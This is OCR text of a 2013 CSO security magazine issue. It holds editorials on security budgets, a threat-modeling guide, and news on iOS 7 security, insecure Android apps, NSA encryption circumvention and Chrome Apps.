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More  Money,  Same  Problems 

My  youngest  child  recently  started  kindergarten.  This  new 
beginning  also  ended  a  monthly  ritual  I’ve  performed  for  more 
than  8  years,  since  the  birth  of  my  first  child:  Writing  out  a  check 
for  thousands  of  dollars  to  our  local  day  care. 

As  a  full-time  working  mother,  the  cost  of 
weekly  childcare  is  just  part  of  the  dues  you  pay 
for  choosing  to  have  a  career.  But  as  any  work¬ 
ing  parent  will  tell  you,  the  fees  are  not  for  the 
weak  of  heart. 

As  the  day  care  tuition  was  about  to  come 
to  an  end,  I  envisioned  everything  my  family 
would  be  able  to  do  with  this  monthly  windfall. 

In  other  words,  I  thought  I  was  about  to  get  a 
huge  raise  simply  because  my  daughter  was 
getting  older. 

Boy,  was  I  wrong. 

What  I  neglected  to  consider  is  that  as 
children  get  older,  they  require  other  costly 
expenses  every  year:  activities,  sports,  uniforms, 
clubs,  electronics,  unexpected  school  fees  that 
seem  to  crop  up  out  of  nowhere.  Before  I  had 
even  had  a  chance  to  make  plans  for  our  new¬ 
found  money,  it  had  already  been  earmarked  for 
other  purposes. 

This  mirrors  what  we’re  witnessing  now  in 
security.  As  you’ll  see  in  this  issue,  our  11th  an¬ 
nual  Global  Information  Security  Survey,  con¬ 
ducted  by  PricewaterhouseCoopers  and  CSO 
magazine,  finds  that  most  security  executives 
are  running  up  against  cost  issues,  too-even  as 
their  budgets  grow.  Much  like  the  day-care-to- 
kindergarten  raise  that  never  came  my  way,  se¬ 
curity  departments  are  getting  raises,  too,  that 
are  quickly  getting  eaten  up  by  other  costs  that 
arise  as  they  struggle  to  mitigate  the  constant 
flow  of  threats  thrown  at  them  yearly. 

As  contributor  George  V.  Hulme  outlines  in 
our  feature  story,  while  organizations  have 
increased  IT  security  spending,  the  number  of 


attacks  they’re  enduring,  and  the  cost  of  those 
attacks,  is  rising. 

Sure,  budgets  increased  51  percent  compared 
to  2012,  according  to  our  respondents.  This  is 
good  news  because  it  means  security  is  finally 
getting  the  attention  and  respect  it  deserves  in 
organizations.  But  the  number  of  incidents  de¬ 
tected  also  rose  25  percent  since  2012.  Add  that 
fact  to  the  growing  list  of  new  technologies  that 
security  professionals  need  to  understand  and 
master  each  year,  and  it’s  no  wonder  that  secu¬ 
rity  continues  to  feel  pinched,  even  with  more 
resources. 

So  as  I  reach  for  my  checkbook  to  make  a 
payment  for  yet  another  childhood  necessity, 

I’d  like  to  ask  you:  Is  there  ever  enough  money  in 
your  budget  to  cover  security  costs?  Or  are  you 
always  playing  catch-up,  too? 

-Joan  Goodchild,  Editor, 
jgoodchild@cxo.  com 


CSO  (ISSN  1540-904X)  is  published  monthly  except  fot  a  combined  issue  in  July/August  and  December/January  by  CXO  Media  Inc.,  492  Old  Connecticut  Path,  P.0.  Box 
9208.  Framingham.  MA  01701-9208.  Periodical  Postage  Rate  at  Framingham.  MA  01701,  and  at  additional  mailing  offices.  Canadian  Publications  Mail  agreement  number 
1902075.  Canadian  Postmaster:  Please  return  undeliverable  copy  to  P.0.  Box  1632.  Windsor,  ON  N9A  7C9.  Copyright  2011  by  CXO  Media  Inc.  All  rights  reserved.  Reproduction 
of  material  appearing  in  CSO  is  forbidden  without  written  permission.  Permission  to  photocopy  for  internal  or  personal  use  or  the  internal  or  personal  use  of  specific 
clients  is  granted  by  CSO  tor  users  through  the  Copyiight  Clearance  Center,  provided  that  a  fee  of  $3.50  per  copy  of  the  article  is  paid  directly  to  Copyright  Clearance 
Center.  222  Rosewood  Drive.  Danvers.  MA  01970.  www  copyright.com.  Please  specify:  ISSN  i540-904x.  Permission  to  photocopy  does  not  extend  to  contributed  articles— 
followed  by  this  symbol:  (  Address  inquiries  to  CSO.  P.0  Box  3482.  Northbrook.  IL  60065: 866  354-1125.  CSO  is  free  to  qualified  security  executives.  To  ail  others  the 
one-year  basic  rate  is  $70  for  the  United  States  and  Canada.  $95  to  foreign  countries  (payable  in  U.S.  funds  only).  The  single  copy  price  is  $9  to  the  US.  and  Canada  and 
$15  International  Please  allow  four  to  six  weeks  for  new  subscriptions  to  begin.  Change  of  Address:  Go  to  www  omeda.com/custsrv/cso  and  follow  the  online  instructions. 
Postmaster:  Send  change  of  address  to.  CSO.  P.0.  Box  3482,  Northbrook,  II 60065.  Printed  in  the  USA. 


2  www.csoonline.com  OCTOBER  2013 


Editor 

Joan  Goodchild 
igoodchild@cxo.com 
508  988-7994 
Twitter:  @msioanieg 

Senior  Editor 

Grant  Hatchimonji 
ghatchimonii@cxo.com 

Senior  Editor,  Copy  and  Production 

Colleen  Barry 

Art  Director 

Steve  Traynor 

Staff  Writer 

Steve  Ragan 
sragan@cxo.com 
Twitter:  @SteveD3 

Editorial  Administrator 

Pat  Josefek 

Research  Manager 

Carolyn  Johnson 

Contributors 

Taylor  Armerding.  David  Geer, 
Antone  Gonsalves,  George  V.  Hulme, 
Jeremy  Kirk.  John  P.  Mello  Jr., 
Lauren  Gibbons  Paul,  Bob  Violino 

Editorial/Advertising/ 
Business  Offices 

492  Old  Connecticut  Path, 

P.O.  Box  9208 

Framingham,  MA  01701-9208 
Main  phone  number:  508  872-0080 

Subscriber  Services 

Phone:  866  354-1125 
Fax:847  564-9453 
cso@omeda.com 

IDG  Enterprise 

An  IDG  Communications  Company  **■ 

International  Data  Group 
Chairman  of  the  Board 

Patrick  J.  McGovern 

IDG  Communications,  Inc. 

CEO 

Bob  Carrigan 

Chief  Content  Officer 

John  Gallant 

#SPA 

WORLDWIDE" 


See  color  in  the  dark  with 
Avigiion  LightCatcher™  technology. 


0VlGHOn 


Get  unparalleled  color  image  detail  in  low  light  conditions  with  Avigilon’s 
innovative  LightCatcher  "  technology.  By  capturing  significantly  more  light 
and  detail  than  regular  cameras,  while  decreasing  the  amount  of  noise, 
LightCatcher "  can  help  you  clearly  see  everything  in  color  that  you  were 
missing  before.  Learn  more  at  avigilon.com/LightCatcher 


The  Eternal  Game  of  Catchup 

You’re  not  doing  security  well.  Don’t  get  me  wrong,  you’re 
doing  a  good  job  at  what  you’re  trying  to  do,  but  you’re  trying  to 
do  the  wrong  things,  and  for  the  most  part  it’s  not  your  fault. 

Information  security  has  been  evolving  into 
enterprise  risk  management,  which  takes  into 
account  the  business  impact,  and  that  includes 
more  than  just  IT  risk.  But  businesses  are  being 
forced  to  spend  money  on  compliance  efforts 
that  do  not  make  them  more  secure-that’s  just 
a  fact.  Take  compliance  away,  and  businesses 
would  spend  their  money  very,  very  differently. 

In  addition  to  compliance,  businesses  are 
throwing  their  money  at  technologies  like  cloud, 
but  they  rarely  quantify  the  risks  their  business¬ 
es  face  and  how  they  are  mitigating  those  risks. 

At  the  same  time,  the  bad  guys  are  improving 
their  game.  Security  teams  are  always  putting 
out  fires  and  you're  finding  yourself  one  or  more 
steps  behind  your  adversaries.  I  don’t  need  to 
spell  the  evolution  to  you,  but  as  a  refresher: 

Script  kiddies  begat  organized  crime  which 
was  followed  by  nation  states  part  one  (I  call 
this  “part  one”  because  they  were  just  trying  to 
steal  our  intellectual  property  back  then). 

Then  along  came  the  hacktivists  like  Anony¬ 
mous,  which  left  organizations  walking  on  their 
tiptoes  through  a  field  of  land  mines,  never 
sure  whether  their  next  step  would  tick  off 
someone  or  some  organization  that  would 
then  blow  them  up. 

In  the  past  two  years,  we  encountered  na¬ 
tion  states  part  two  (this  time  they’re  looking 
to  take  down  our  financial  systems,  or  at  least 
shut  off  the  lights). 


And  as  always,  there  is  the  insider  threat,  as 
the  NSA  learned  with  Edward  Snowden. 

How  can  you  get  ahead  of  your  foes,  or  is 
that  impossible  because  they  only  have  to  be 
right  once  and  you  have  to  be  right  every  time? 

So  I  ask:  If  we’re  taking  all  these  risks  and 
spending  all  this  money  to  mitigate  those  risks, 
then  why  aren’t  things  getting  any  better?  I’d 
like  to  hear  your  thoughts  on  this  challenge  and 
what  can  be  done  to  address  it. 

Next  month  I’ll  explore  part  two  of  this  issue: 
technologies  and  collaboration. 

-Bob  Bragdon,  publisher 
bbragdon@cxo.com 
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Using  Threat  Modeling  to 
Elevate  InfoSec’s  Strategic  Role 


By  Jason  Clark  and  Tom  August 

Information  security  programs  are  vital  to  the 
success  of  any  organization,  yet  our  executive 
teams  frequently  don’t  recognize  their  strategic 
value.  That’s  often  because  we  security  profes¬ 
sionals  don’t  understand  the  overall  goals  of  the 
business  and  align  our  programs  to  support  them. 

We’ve  found  threat  modeling  to  be  an  effective 
remedy.  Simply  defined,  threat  modeling  is  an 
exercise  that  describes  the  security  stance  of  an 
organization  or  system  in  terms  of  specific  threats 
or  attacks  that,  if  successful,  could  result  in  harm. 
It’s  a  powerful  tool  for  improving  how  our  teams 
engage  with  our  leadership  and  repositioning  us 
as  business-critical  colleagues. 

The  following  steps  explain  how  to  implement 
threat  modeling.  We  use  a  hospital  as  an  exam¬ 
ple,  but  the  steps  are  applicable  anywhere. 

Ask  executives  to  identify  the  top  business 
threats.  Then  investigate  whether  existing  de¬ 
fenses  can  prevent  these  threats  from  happening. 
For  example,  a  hospital  faces  the  threat  of  disrup¬ 
tions  to  electronic  medical  record  (EMR)  systems 
that  could  significantly  impact  patient  care. 

Identify  the  people,  process  or  technol- 
ogy  gaps  that  could  allow  these  business 
threats  to  happen.  These  might  include 
ineffective  governance,  insufficient  security 
awareness,  or  poorly  configured  or  maintained 
technologies.  In  our  hospital  scenario,  there 
might  be  sufficient  redundancy  for  backup  in  a 
system  outage,  but  IT  staff  might  lack  adequate 
documentation  to  quickly  re-establish  access  to 
the  EMR  system,  putting  patients  at  risk. 

Identify  the  attacks  that  could  exploit 
these  gaps.  By  identifying  potential  attacks, 
your  team  can  then  identify  any  existing  controls 
that  protect  against  them  and  determine  any 
remaining  risk  items;  these  can  then  be  prior¬ 
itized  according  to  likelihood  and  impact.  A  lack 
of  security  awareness  among  hospital  staff  might 
result  in  a  social  engineering  attack  that  identifies 
VIPs  receiving  medical  treatment  and  sells  that 
information  to  the  media  or  posts  it  online. 


Illustrate  what  a  potential  attack  would 
look  like.  These  attack  types  can  then  be 
prioritized  based  on  likelihood  and  impact. 

A  social  engineering  attack  against  a  hospital 
might  include:  a  physical  attack  against  external¬ 
facing  employees,  such  as  front  office  staff  and 
security  guards;  a  telephone  attack  against 
executive  administrative  assistants,  call  centers 
or  help  desks;  and  an  email  attack  against  the 
entire  organization. 

Walk  through  each  potential  attack. 

This  is  best  performed  with  a  variety  of  people 
from  within  the  business  and  IT.  The  goal  is  to 
identify  where  existing  controls  break  down  and 
where  additional  action  may  be  required. 

Identify  the  appropriate  response  for 
each  attack.  These  might  include  risk  avoid¬ 
ance,  risk  mitigation,  transference  or  risk 
acceptance.  IT  staff  could  perform  risk  mitiga¬ 
tion  against  social  engineering,  for  example,  by 
increasing  security  awareness  training. 

Propose  a  risk  management  strategy. 

Make  sure  to  clearly  show  the  links  between 
initiatives,  budget  items,  threats  and  responses. 

Share  the  strategy  with  leadership. 

Because  leadership  was  engaged  in  the  process, 
they  can  better  understand  how  your  plan  can 
support  their  business  objectives.  (You  should 
still  avoid  using  buzzwords  and  “tech-speak”  to 
keep  things  simple  and  clear.) 

As  you  can  see,  threat  modeling  can  do  more 
than  help  define  security  programs  and  identify 
security  gaps.  It  can  help  build  trust  between  our 
departments  and  leadership  by: 

Showing  greater  understanding 
of  business  needs. 

Highlighting  how  well  existing 
processes  and  technologies  address 
threats  to  the  business. 

Sharing  the  potential  costs  of 
addressing  any  remaining  risk.  ■ 
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New  iOS  Makes  iPhones  Safer 


Apple  introduced  several  new  features  that  appeal  to  security  pros  and  enterprises  by  john  p.  mello,  jr. 


FINGERPRINT  READING  ISN’T  THE 
only  sign  that  Apple  is  upping  the  ante  in  mo¬ 
bile  security.  Its  new  operating  system  is  full  of 
goodies  that  should  boost  its  security  appeal 
in  the  enterprise. 

“Before  iOS  7,  Apple  already  had  a  secure 
operating  system,  with  many  options  avail¬ 
able  to  enterprises  to  lock  them  down,”  says 
SilverSky  CTO  Andrew  Jaquith.  "Only  the 
BlackBerry  had  more  options.  With  iOS  7,  com¬ 
panies  will  find  many  of  their  remaining  needs 
addressed.  It’s  clear  that  Apple  is  listening  to 
their  enterprise  customers.” 

Following  the  security  lead  of  BlackBerry, 
and  Samsung  with  its  Knox  platform,  Apple 
has  added  features  to  help  segregate  person¬ 
al  from  professional  information  on  a  device. 

“They  are  doing  this  with  a  few  different 
features,  including  restricting  company  apps 
from  talking  to  personal  apps,  as  well  as  of¬ 
fering  a  per-app  VPN,  which  can  selectively 
route  only  enterprise  traffic,”  says  Jonathan 
Dale,  marketing  director  of  Fiberlink. 

"In  my  opinion,  Apple  appears  to  have  sig¬ 
nificantly  improved  the  controls  which  help 
separate  work  and  personal  information,” 

Dale  says.  “Users  and  companies  should  feel 
more  secure  that  their  data  will  not  go  to  un¬ 
intended  places.” 

The  new  iOS  also  has  better  support  for 
mobile  device  management  (MDM)  systems. 
While  before  there  was  a  lag  between  initial¬ 
izing  a  device  on  the  network  and  enrolling  it 
in  an  MDM,  now  the  two  tasks  can  rolled  into 
one  for  more  efficient  and  easier  operation. 

“There  will  be  more  mobile  security  policies 
available  to  lock  down  devices,"  SilverSky’s 
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■  John  P.  Mello,  Jr.  is  a  freelance  writer  and  frequent 
contributer  to  CSO. 


Jaquith  says.  “These  include  additional  options  for  restrict¬ 
ing  Siri,  AirDrop  file  sharing,  and  which  apps  can  open 
particular  files  and  attachments.  Admins  should  be  able 
to  restrict  documents  in  company  email,  for  example,  from 
being  opened  in  DropBox." 

Apple  has  also  enhanced  containerization  in  the  OS.  Its 
managed  open-in  feature  allows  companies  to  designate 
which  apps  can  open  which  files,  which  separates  personal 
and  corporate  data  so  business  content  will  be  opened 
only  in  enterprise-approved  apps. 

The  new  iOS  also  adds  a  single  sign-on  feature,  which 
allows  a  device  to  communicate  with  the  back  end  of  a 
system  without  each  of  its  apps  generating  usernames 
and  passwords  for  themselves.  “It  makes  things  much 
easier  for  the  end  user,”  says  PJ  Gupta,  CEO  of  Amtel. 

Senthil  Krishnapillai,  head  of  mobile  security  for  SAP, 
says,  “It  tremendously  improves  the  usability  of  the  appli¬ 
cation  and,  combined  with  fingerprint  reading,  it  gives  you 
true  two-factor  authentication.” 

With  the  new  iOS,  Apple  is  also  giving  administrators 
the  power  to  reuse  app  licenses.  In  previous  systems,  when 
an  app  was  issued  to  an  employee,  its  license  stayed  with 
that  employee,  not  with  the  company.  Now  that  license 
can  be  recovered  by  the  organization.  “There  was  no  way 
to  reclaim  the  license,”  Fiberlink's  Dale  says.  “It  was  a  big 
deal  because  it  was  a  big  pain.” 

Gupta  noted  that  Apple  has  also  modified  the  applica¬ 
tion  lock  feature  in  the  new  iOS.  Before,  if  a  phone  was  lost 
or  stolen,  whoever  recovered  the  handset  might  not  have 
been  able  to  get  past  the  application  lock  to  access  the 
phone’s  data,  but  they  could  do  a  system  reset  and  use  the 
phone  as  their  own. 

That  can’t  be  done  with  iOS  7.  If  the  application  lock  is 
activated,  a  system  reset  won’t  allow  the  phone  to  be  re¬ 
used.  “It  becomes  a  brick,”  Gupta  says. 

With  its  new  security  features,  iOS  is  keeping  pace  with 
security  stalwart  BlackBerry  and  Samsung’s  new  Knox 
security  platform.  “With  the  introduction  of  Knox,  Apple 
has  had  to  play  catchup  with  Samsung  in  the  enterprise 
market,"  Gupta  says. 

However,  SAP’s  Krishnapillai  says  that  because  of  the 
way  the  Android  ecosystem  works,  Apple  has  a  leg  up  on 
Samsung.  Knox  is  limited  to  a  specific  model  of  Samsung 
phone.  “Developers  writing  for  Knox  have  to  make  an 
app  for  Knox  and  one  for  the  rest  of  the  Android  market,” 
Krishnapillai  says.  “App  developers  for  iOS  only  have  to 
write  for  iOS.” 
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On  Android,  Even  Major 
Brands’  Apps  Are  Not  Secure 

IN  A  STUDY  ON  MOBILE  APPS  AND  THEIR  LEVEL  OF  SECU- 
rity,  RIIS,  a  firm  that  specializes  in  mobile  app  development,  says  some 
of  the  nation’s  top  brands-including  airlines,  retail  outlets,  entertain¬ 
ment  companies,  and  insurance  companies-are  producing  Android 
apps  that  place  users  and  their  personal  information  at  risk. 

RIIS  tested  20  Android  apps  to  determine  how  many  of  OWASP’s  top 
10  simple  security  flaws  they  included.  Only  four  apps  displayed  none  of 
the  top  10  flaws.  The  other  16  apps  all  had  at  least  one  flaw. 

Many  of  the  apps  tested  are  consumer-focused,  including  those  from 
Wal-Mart,  Delta,  Facebook,  Geico,  Ticketmaster  and  Speedway,  which 
means  they  can  show  up  on  anyone’s  network. 

Delta’s  and  Geico’s  apps  were  the  worst  offenders,  guilty  of  such  se¬ 
curity  sins  as  insecure  data  storage,  poor  authorization  and  authentica¬ 
tion,  broken  cryptography  and  disclosing  sensitive  information. 

On  the  other  side  of  that  coin,  the  four  apps  that  didn’t  include  any  of 
OWASP’s  top  10  errors  were  those  put  out  by  Wells  Fargo,  Chase,  State 
Farm, and  the  IRS. 

Godfrey  Nolan,  the  lead  researcher  in  the  study,  says  that  Delta’s  app 
stores  the  user’s  password  in  an  encrypted  SQLite  database,  and  “the 
key  is  in  the  APK,  which  can  be  reverse  engineered  back  into  source  code 
using  some  simple  tools  available  on  the  Internet.” 

“It  is  common  practice  (and  a  fundamental  security  flaw)  to  store  the 
username  and  password  encrypted  in  a  SQLite  database  or  shared  pref¬ 
erences  folder  with  a  hardcoded  encryption  key  which  can  be  found  by 
decompiling  the  APK,”  the  report  says. 

Geico  and  Ticketmaster  both  offered  apps  that  exposed  login  infor¬ 
mation,  and  LiveNation’s  tool  doesn’t  use  any  encryption,  storing  the 
login  details  in  clear  text. 

Many  of  the  developers  RIIS  spoke  to  reacted  negatively,  Nolan  says, 
which  may  imply  that  they  were  not  concerned  about  the  issues  the 
study  had  uncovered  and  were  willing  to  trade  security  for  usability. 

Nolan’s  advice  is  for  security  staff  to  apply  mobile  security  scanning 
techniques  to  ensure  the  organization  knows  what  apps  are  insecure  be¬ 
fore  allowing  them  to  be  installed  on  any  employee-owned  or  company 
devices.  -Steve  Ragan 
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Tony  Bradley,  Bradley  Strategy  Group 
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NSA  Cracked  Your  Encryption?  Blame  Yourself 


THE  NATIONAL  SECURITY  AGENCY  IS 
making  headlines  once  again  thanks  to  new 
revelations  from  fugitive  whistle-blower  Ed¬ 
ward  Snowden.  Snowden  claims  that  efforts 
to  encrypt  communications  are  incapable  of 
preventing  access  by  the  NSA,  but  at  least  one 
security  expert  maintains  that  this  claim  is 
probably  exaggerated  and  that  security  pros 
may  unwittingly  play  a  significant  role  in  al¬ 
lowing  the  NSA  to  break  their  encryptions. 

According  to  a  report  from  United  Press 
International,  “The  [NSA],  at  a  cost  of  more 
than  $250  million  in  the  current  year’s  budget, 
employs  custom-built,  superfast  computers 
to  break  codes  with  ‘brute  force,’  uses  covert 
measures  to  ensure  NSA  control  over  setting 
international  encryption  standards  and,  in  the 
most  closely  guarded  secret,  collaborates  with 
technology  companies  and  Internet  service 
providers  in  the  process,  said  the  documents 
published  by  The  New  York  Times,  the  non¬ 
profit  news  organization  ProPublica  and  a 
British  newspaper,  The  Guardian.” 

Is  it  possible?  Yes.  There  is  no  such  thing 
as  absolutely  impenetrable  encryption.  Given 


enough  processing  power  and  time,  the  NSA 
can  just  try  every  possible  combination  in 
existence  until  it  hits  the  right  one-a  brute- 
force  attack.  An  encryption  algorithm  based 
on  a  256-bit  key,  however,  has  IxlO77  possibili¬ 
ties.  That’s  a  10  with  77  zeros  after  it. 

When  you’re  brute  forcing,  you  could  get 
lucky  and  hit  it  on  the  first  try,  or  it  could  take 
you  IxlO77  attempts.  I  have  no  idea  what  you 
even  call  a  number  with  77  zeros,  but  suffice 
it  to  say  it's  astronomically  huge.  I  don’t  care 
how  powerful  your  computers  are,  it  will  take 
a  long  time  to  try  out  that  many  key  combina¬ 
tions  to  find  the  right  one. 

Dave  Anderson,  a  senior  director  with  Volt¬ 
age  Security,  agrees  that  the  NSA’s  capabili¬ 
ties  may  have  been  overstated.  “To  quote 
Snowden  himself,  ‘Encryption  works.  Properly 
implemented  strong  crypto  systems  are  one 
of  the  few  things  that  you  can  rely  on.”’ 

Anderson  suggests  that  the  NSA’s  ability  to 
bypass  encryption  is  almost  certainly  a  func¬ 
tion  of  flawed  implementation  or  poor  en¬ 
cryption-key  management.  “Is  it  possible  that 
the  NSA  can  decrypt  financial  and  shopping 


accounts?  Perhaps,  but  only  if  the  cryptog¬ 
raphy  that  was  used  to  protect  the  sensitive 
transactions  was  improperly  implemented 
through  faulty,  incomplete  or  invalid  key  man¬ 
agement  processes  or  simple  human  error.” 

When  properly  implemented,  encryption 
provides  essentially  unbreakable  security.  It’s 
the  sort  of  security  that  it  would  take  implau¬ 
sibly  powerful  supercomputers  millions  of 
years  to  crack.  But  if  it’s  carelessly  implement¬ 
ed,  and  the  key-management  processes  are 
not  sound,  this  security  can  be  reduced  to  the 
level  where  a  hacker  with  a  mid-market  PC 
can  crack  it  in  a  few  hours  at  most. 

Regardless,  these  rumors  underscore  a  mas¬ 
sive  problem  with  data  security.  Encryption  is 
generally  touted  as  the  Holy  Grail  magic  solu¬ 
tion  for  all  things  data  security,  so  many  orga¬ 
nizations  and  individuals  just  turn  on  whatever 
encryption  is  the  easiest  or  most  convenient 
and  expect  communications  and  data  to  be 
invulnerable.  It’s  an  unrealistic  expectation. 

You  can  have  the  best,  most  formidable 
lock  in  the  world  securing  the  front  door  to 
your  home,  but  if  you  hide  the  key  under  the 
welcome  mat,  it  won’t  stop  an  intruder.  If 
the  NSA  is  cracking  all  the  encryption  on 
the  Internet,  there’s  a  pretty  good  chance 
that  a  weakness  in  key  management  is 
making  it  possible-maybe  even  easy.  It 
might  be  a  weakness  in  how  the  keys  are 
being  generated  or  how  they’re  stored. 

The  key-management  lifecycle  typically 
relies  in  part  on  human  intervention,  which 
brings  an  element  of  human  error  into  the 
equation  as  well. 

Anderson  summed  up  with,  “General 
Robert  Barrow  once  said  that  amateurs 
think  about  tactics  while  professionals 
think  about  logistics.  An  appropriate  way 
to  update  this  to  the  Internet  age  might 
be  that  amateurs  talk  about  encryp¬ 
tion  while  professionals  talk  about  key 
management.” 


8  www.csoonline.com  OCTOBER  2013 


CSO's  e-Mail  Newsletters 


Keep  Up  To  Speed 

On  the  Security  Issues  Important  to  You 
Delivered  right  to  your  desktop 


a 

a 

a 

a 

a 

a 

a 

a 

a 


CSO  Update 

A  look  at  the  latest  security  news  and  analysis  on 
CSOonline.com,  delivered  three  times  a  week. 

CSO  Salted  Hash 

IT  security  news  and  analysis,  over  easy,  delivered  daily. 

CSO  News  Watch 

A  recap  of  the  week’s  top  news  stories. 

CSO  Career 

A  twice-monthly  newsletter  of  career  and  leadership- 
oriented  news,  articles  and  events  plus  job  postings. 

CSO  Tech  Watch 

Twice-monthly  update  on  technologies  for  protecting  networks,  facilities, 
employees,  intellectual  property  and  more. 

CSO  Security  Leader 

Biweekly  leadership-related  articles  and  reports  from  CSO,  as  well  as  tips 
for  educating  employees  and  corporate  leadership. 

CSO  Continuity  &  Recovery 

A  twice-monthly  review  of  published  material  concerning 
business  continuity  and  disaster  recovery. 

Security  Research  &  Metrics 

A  monthly  roundup  of  useful  security  research,  benchmarks  and  statistics. 

CSO  Risk  Management 

A  monthly  roundup  of  strategies  and  tools  for  accurate  measurement  and 
prioritization  of  risks. 


Sign  up  now  for  CSO’s 
complimentary  e-mail  newsletters 
www.CSOonline.com/newsletters 


BUSINESS  RISK  LEADERSHIP 


Tech 


Chrome  Apps  May  Not  Be  Worth  the  Risk 


GOOGLE’S  LAUNCH  OF  CHROME  APPS, 
a  new  breed  of  browser-based  software  that 
will  run  on  top  of  any  operating  system,  has 
left  skeptical  security  experts  wondering 
whether  Google  is  needlessly  creating  a  new 
opening  for  cybercriminals. 

Launched  in  early  September,  Chrome  Apps 
is  Google’s  latest  step  toward  embedding  its 
many  services  in  the  operating  systems  of 
rivals  Microsoft  and  Apple.  The  goal  is  make 
apps  running  on  Google’s  platform  appear  to 
run  natively  on  either  Windows  or  Mac  OS  X. 

Even  though  Chrome  Apps  require  Google’s 
Chrome  Web  browser,  the  software  can  run 
outside  the  browser  and  offline.  Documents, 
photos  and  video  can  be  saved  on  a  computer’s 
hard  drive,  as  well  as  to  Google’s  cloud  storage 
service,  called  Google  Drive.  Updates,  including 
security  patches,  occur  automatically. 

Initially,  Chrome  Apps  will  run  only  on  Win¬ 
dows  and  the  Google  Chromebook,  an  inex¬ 
pensive  netbook  powered  by  Google’s  Chrome 
OS.  In  the  near  future,  Chrome  Apps  will  also 
run  on  Mac  OS  X  and  Linux. 

The  strategy  behind  Chrome  Apps  is  to 
merge  the  technology  with  the  host  OS  so 
users  do  not  notice  a  difference.  This  all-in- 
one  approach  aimed  at  improving  the  user 
experience  increases  the  likelihood  people  will 
use  Google  services,  which  means  the  compa- 

Security  experts 
worry  that  Google 
is  creating  a  layer 
of  complexity  that 
will  introduce  a  new 
set  of  vulnerabilities 
for  cybercriminals 
to  exploit. 
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ny  can  gather  more  data  to  sell  to  advertisers. 

“We  want  Chrome  Apps  to  be  so  good  you 
don’t  even  realize  it’s  something  different,” 
Rahul  Roy-Chowdhury,  project  manager  for 
Chrome  Apps,  told  the  technology  website 
The  Verge. 

While  the  goal  makes  good  business  sense, 
security  experts  worry  that  Google  is  creat¬ 
ing  a  layer  of  complexity  that  will  introduce  a 
new  set  of  vulnerabilities  for  cybercriminals 
to  exploit.  Much  of  the  concern  is  based  on 
the  huge  security  headache  caused  by  other 
cross-platform  technologies  for  running  appli¬ 
cations,  such  as  Adobe  Flash  and  Java,  which 
was  developed  by  Sun  Microsystems.  Sun  was 
acquired  by  Oracle  in  2009. 

“Sun  pioneered  the  ‘write  once,  infect  ev¬ 
erywhere’  model  that  Oracle  has  perpetuat¬ 
ed,”  says  Randy  Abrams,  research  director  for 
security  adviser  NSS  Labs. 

Because  Google  gathers  enormous 
amounts  of  user  data,  Chrome  Apps  are  un¬ 
likely  to  be  welcomed  by  companies,  Abrams 
says.  “There  are  serious  concerns  as  to  privacy 
and  data  leakage  when  it  comes  to  Google,” 
he  says.  “Chrome  Apps  will  be  a  huge  concern 
for  enterprises  trying  to  protect  intellectual 


property  and  other  sensitive  data,  as  well  as  a 
new  security  headache.” 

Vulnerabilities  are  a  given  in  every  soft¬ 
ware,  so  it  is  important  to  look  at  the  vendor's 
track  record  for  getting  out  patches  quickly. 
While  Google  has  often  been  criticized  for 
making  security  blunders  in  Android,  its  mo¬ 
bile  operating  system,  the  company  has  incor¬ 
porated  strong  security  in  the  Chrome  browser 
and  in  its  Web  services. 

"They  have  been  really  impressive  on  the 
security  side,”  says  Wolfgang  Kandek,  CTO  for 
vulnerability-management  company  Qualys. 

Nevertheless,  Google  will  have  to  provide 
a  compelling  reason  to  risk  the  inevitable 
vulnerabilities  introduced  with  its  new  ap¬ 
plication  platform.  Simply  offering  to  run  soft¬ 
ware  similar  to  what  is  already  available  for 
Windows  or  Mac  OS  X  is  unlikely  to  lure  many 
users,  and  is  certainly  not  worth  the  risk. 

“From  a  security  point  of  view,  [Chrome 
Apps]  is  something  to  keep  your  eye  on,  be¬ 
cause  hackers  love  to  go  after  things  that  are 
new  and  interesting,"  says  Court  Little,  senior 
service  architect  for  managed  security  pro¬ 
vider  Solutionary. 

-Antone  Gonsalves 
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Schneier  Says  NSA’s  Encryption-Breaking  Scheme 
Destroys  the  Fundamental  Fabric  of  the  Internet 


THE  NATIONAL  SECURITY  AGENCY’S 
efforts  to  defeat  encrypted  Internet  commu¬ 
nications  are  an  attack  on  the  security  of  the 
Internet  and  on  users’  trust  in  the  network, 
some  security  experts  say. 

The  NSA  and  intelligence  agencies  in  al¬ 
lied  countries  have  found  ways  to  circumvent 
much  of  the  encryption  used  on  the  Internet, 
according  to  stories  in  The  New 
York  Times,  ProPublica  and  the 
Guardian.  The  NSA,  the  Brit¬ 
ish  Government  Communica¬ 
tions  Headquarters  and  other 
spy  agencies  have  used  a  variety 
of  means  to  defeat  encryption, 
including  supercomputers,  court 
orders  and  behind-the-scenes 
agreements  with  tech  compa¬ 
nies,  according  to  the  reports. 

The  reports,  relying  on  docu¬ 
ments  provided  by  former  NSA 
contractor  Edward  Snowden, 
show  that  many  tech  compa¬ 
nies  are  collaborating  with  the 
spy  agencies  to  “destroy  privacy,” 
says  cryptographer  and  security 
specialist  Bruce  Schneier.  “The 
fundamental  fabric  of  the  Inter¬ 
net  has  been  destroyed." 

The  new  revelations  should 
raise  major  concerns  from  Inter- 


Digital  rights  group  the  Center  for  Democ¬ 
racy  and  Technology  echoed  some  of  Schnei- 
er’s  concerns,  with  senior  staff  technologist 
Joseph  Lorenzo  Hall  calling  the  NSA’s  encryp¬ 
tion  circumvention  efforts  “a  fundamental  at¬ 
tack  on  the  way  the  Internet  works.” 

The  NSA  has  been  working  for  years  to 
build  backdoor  vulnerabilities  into  encryption 


m 


■m hi 


General  Keith  Alexander,  director  of  the  National  Security  Agency, 
responds  to  questions  at  the  Black  Hat  2013  hacker  convention. 


net  users  over  who  they  can  trust,  Schneier 
says.  “I  assume  that  all  big  companies  are 
now  in  cahoots  with  the  NSA,  cannot  be  trust¬ 
ed,  are  lying  to  us  constantly,”  he  says.  "You 
cannot  trust  any  company  that  makes  any 
claims  of  the  security  of  their  products.  Not 
one  cloud  provider,  not  one  software  provider, 
not  one  hardware  manufacturer.” 

It  appears  that  the  NSA  is  defeating  en¬ 
cryption  not  by  brute  force  but  by  “cheating”- 
attempting  to  build  backdoors  into  systems 
and  strong-arm  companies  into  giving  it  infor¬ 
mation,  Schneier  says. 


standards  and  technology  products,  reports 
say.  Hall  criticized  those  efforts.  “In  an  era  in 
which  businesses,  as  well  as  the  average  con¬ 
sumer,  trust  secure  networks  and  technologies 
for  sensitive  transactions  and  private  com¬ 
